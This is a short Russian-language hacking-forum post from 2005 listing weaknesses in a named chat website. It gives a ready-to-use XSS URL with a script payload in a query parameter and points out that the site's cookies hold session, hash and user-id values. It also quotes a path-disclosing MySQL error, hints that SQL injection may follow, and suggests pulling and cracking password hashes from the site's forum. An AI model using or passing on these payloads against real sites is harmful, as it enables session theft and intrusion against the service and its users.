23.05.2005, 13:48
|
|
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258
Репутация:
648
|
|
У них есть Форум (правда - если параноик, проблемно будет хэш перебрать (при условии если ты его выташишь))
...
+ xss:
http://www.chatmoscow.ru/fotos/view.php?o_id=<script>alert(/testing_by_censored!/)</script>&album=
В куках лежит сессия, и чат_хэш и id пользователя.
...
+ тамже раскрытие пути + вылетает ошибка. Если силен в SQL, то возможно и получится sql-including
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chat4794/chat-www/conn.php on line 108
|
|
|